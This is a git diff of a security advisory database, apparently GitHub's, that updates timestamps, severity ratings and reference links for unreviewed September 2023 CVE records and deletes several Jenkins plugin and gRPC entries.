diff --git a/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json b/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json
index e9754f8afc40f..4e6b15d16806c 100644
--- a/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json
+++ b/advisories/unreviewed/2023/09/GHSA-j4rp-ppmv-7whr/GHSA-j4rp-ppmv-7whr.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j4rp-ppmv-7whr",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4906"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json b/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json
index 66eb6d86ffb6d..c2d4b0c4cf2ec 100644
--- a/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json
+++ b/advisories/unreviewed/2023/09/GHSA-j66v-q82h-4f8h/GHSA-j66v-q82h-4f8h.json
@@ -105,6 +105,18 @@
 "type": "WEB",
 "url": "https://access.redhat.com/errata/RHSA-2024:0461"
 },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0562"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0563"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0593"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/security/cve/CVE-2023-42753"
diff --git a/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json b/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json
index 186e74603cd89..0f8b507e3f9c2 100644
--- a/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json
+++ b/advisories/unreviewed/2023/09/GHSA-j6rc-chh6-q5hw/GHSA-j6rc-chh6-q5hw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-j6rc-chh6-q5hw",
- "modified": "2023-09-16T00:30:30Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-09-16T00:30:30Z",
 "aliases": [
 "CVE-2023-36735"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36735"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-15T22:15:13Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json b/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json
index 7502d050f24a6..18fb3e5aea50c 100644
--- a/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json
+++ b/advisories/unreviewed/2023/09/GHSA-m7p3-g2hx-xfc3/GHSA-m7p3-g2hx-xfc3.json
@@ -29,6 +29,10 @@
 "type": "WEB",
 "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240541"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-01"
+ },
 {
 "type": "WEB",
 "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=30884"
diff --git a/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json b/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json
index 58743b029a2fc..b259dd3832184 100644
--- a/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json
+++ b/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mwc5-mc4g-5jw5",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4909"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:09Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json b/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json
deleted file mode 100644
index 59c249bf703e2..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json
+++ /dev/null
@@ -1,54 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p25m-jpj4-qcrr",
- "modified": "2023-09-13T18:31:26Z",
- "published": "2023-09-13T18:31:26Z",
- "aliases": [
- "CVE-2023-4785"
- ],
- "details": "Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. ",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4785"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grpc/grpc/pull/33656"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grpc/grpc/pull/33667"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grpc/grpc/pull/33669"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grpc/grpc/pull/33670"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grpc/grpc/pull/33672"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-248"
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-13T17:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json b/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json
index fb9d7cd1a7ec1..f3219e0f3c16f 100644
--- a/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json
+++ b/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p489-ffhp-rw3f",
- "modified": "2023-09-28T15:30:16Z",
+ "modified": "2024-01-31T15:30:18Z",
 "published": "2023-09-27T15:30:36Z",
 "aliases": [
 "CVE-2023-40451"
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40451"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-33"
+ },
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213941"
@@ -38,7 +42,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-27T15:19:17Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json b/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json
deleted file mode 100644
index d1dfa7bab562f..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-p986-hpr3-493p",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41947"
- ],
- "details": "A missing permission check in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers with Overall/Read permission to connect to Frugal Testing using attacker-specified credentials.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41947"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json b/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json
deleted file mode 100644
index 1aa91323009b7..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-pfg6-cj3j-rpv4",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41941"
- ],
- "details": "A missing permission check in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41941"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(1)"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json b/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json
index a29e947085fff..3fb9b0461811b 100644
--- a/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json
+++ b/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-ppmf-rp3c-49x9",
- "modified": "2023-09-13T06:30:21Z",
+ "modified": "2024-01-30T21:30:28Z",
 "published": "2023-09-12T00:30:26Z",
 "aliases": [
 "CVE-2023-40440"
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40440"
 },
+ {
+ "type": "WEB",
+ "url": "https://blog.aegrel.ee/apple-mail-smime.html"
+ },
 {
 "type": "WEB",
 "url": "https://support.apple.com/en-us/HT213844"
@@ -30,7 +34,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T00:15:09Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json b/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json
index f03a0e934d167..e40eca79c9860 100644
--- a/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json
+++ b/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-prc6-xmpq-r4g3",
- "modified": "2023-10-05T15:30:15Z",
+ "modified": "2024-02-02T18:30:24Z",
 "published": "2023-09-28T00:30:21Z",
 "aliases": [
 "CVE-2023-43320"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://bugzilla.proxmox.com/show_bug.cgi?id=4584"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176967/Proxmox-VE-7.4-1-TOTP-Brute-Force.html"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-27T23:15:12Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json b/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json
index 451e60c2f22f2..e84bd75d65b27 100644
--- a/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json
+++ b/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-prfg-cph5-wq68",
- "modified": "2023-09-16T00:30:30Z",
+ "modified": "2024-02-03T09:30:17Z",
 "published": "2023-09-16T00:30:30Z",
 "aliases": [
 "CVE-2023-36727"
@@ -24,13 +24,17 @@
 {
 "type": "WEB",
 "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36727"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-05"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-15T22:15:13Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json b/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json
index 1427beb192e6f..54b1c8b047257 100644
--- a/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json
+++ b/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-q9jw-w6mv-2j54",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4904"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json b/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json
deleted file mode 100644
index 593f1d8130666..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-qf42-f5vf-6w99",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41945"
- ],
- "details": "Jenkins Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled, resulting in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41945"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3065"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json b/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json
index e46d61bcaefe0..ca64e2344f4e4 100644
--- a/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json
+++ b/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qf8c-938w-pvrw",
- "modified": "2023-09-29T18:30:22Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-28T18:30:45Z",
 "aliases": [
 "CVE-2023-5186"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5508"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 "CWE-416"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-28T16:15:10Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json b/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json
index fff4c7c6a873c..5ab16413af077 100644
--- a/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json
+++ b/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qr34-fv3w-3x4j",
- "modified": "2023-09-29T00:30:15Z",
+ "modified": "2024-01-29T21:30:25Z",
 "published": "2023-09-27T15:30:34Z",
 "aliases": [
 "CVE-2023-35793"
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35793"
 },
+ {
+ "type": "WEB",
+ "url": "https://blog.kscsc.online/cves/202335793/md.html"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH"
@@ -34,7 +38,7 @@
 "cwe_ids": [
 "CWE-352"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-27T15:18:52Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json b/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json
deleted file mode 100644
index cd95d4f6c0fe7..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-r428-g373-m2h4",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41943"
- ],
- "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to clear the SQS queue.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41943"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:11Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json b/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json
index bdc2e441710f8..2234a0bc7985b 100644
--- a/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json
+++ b/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r735-966q-57pq",
- "modified": "2023-09-15T18:30:30Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4902"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:08Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json b/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json
index 1b4ca0d8a4527..44e92564f91b9 100644
--- a/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json
+++ b/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v792-wxjq-p469",
- "modified": "2023-09-20T18:30:20Z",
+ "modified": "2024-02-02T18:30:24Z",
 "published": "2023-09-15T15:30:15Z",
 "aliases": [
 "CVE-2023-42270"
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42270"
 },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176958/Grocy-4.0.2-Cross-Site-Request-Forgery.html"
+ },
 {
 "type": "WEB",
 "url": "http://xploit.sh/posts/cve-2023-xxxxx/"
@@ -30,7 +34,7 @@
 "cwe_ids": [
 "CWE-352"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-15T14:15:11Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json b/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json
index caa7fcb655559..2f8bfd03b8a4b 100644
--- a/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json
+++ b/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vm6c-x6px-r22m",
- "modified": "2023-09-29T18:30:22Z",
+ "modified": "2024-02-02T18:30:24Z",
 "published": "2023-09-28T03:30:19Z",
 "aliases": [
 "CVE-2023-42222"
@@ -32,13 +32,17 @@
 {
 "type": "WEB",
 "url": "https://www.electronjs.org/docs/latest/tutorial/security#15-do-not-use-shellopenexternal-with-untrusted-content"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176957/WebCatalog-48.4-Arbitrary-Protocol-Execution-Code-Execution.html"
 }
 ],
 "database_specific": {
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-28T03:15:11Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json b/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json
deleted file mode 100644
index 2ef88ffacfc26..0000000000000
--- a/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json
+++ /dev/null
@@ -1,39 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-vrpg-c7c4-8mpx",
- "modified": "2023-09-06T15:30:26Z",
- "published": "2023-09-06T15:30:26Z",
- "aliases": [
- "CVE-2023-41937"
- ],
- "details": "Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41937"
- },
- {
- "type": "WEB",
- "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3165"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2023-09-06T13:15:10Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json b/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json
index 8d301292c82cd..08fe3dac4e004 100644
--- a/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json
+++ b/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json
@@ -25,6 +25,10 @@
 "type": "WEB",
 "url": "https://kb.isc.org/docs/cve-2023-3341"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00021.html"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPJLLTJCSDJJII7IIZPLTBQNWP7MZH7F/"
diff --git a/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json b/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json
index 30eb82488987b..467c977ebe7a8 100644
--- a/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json
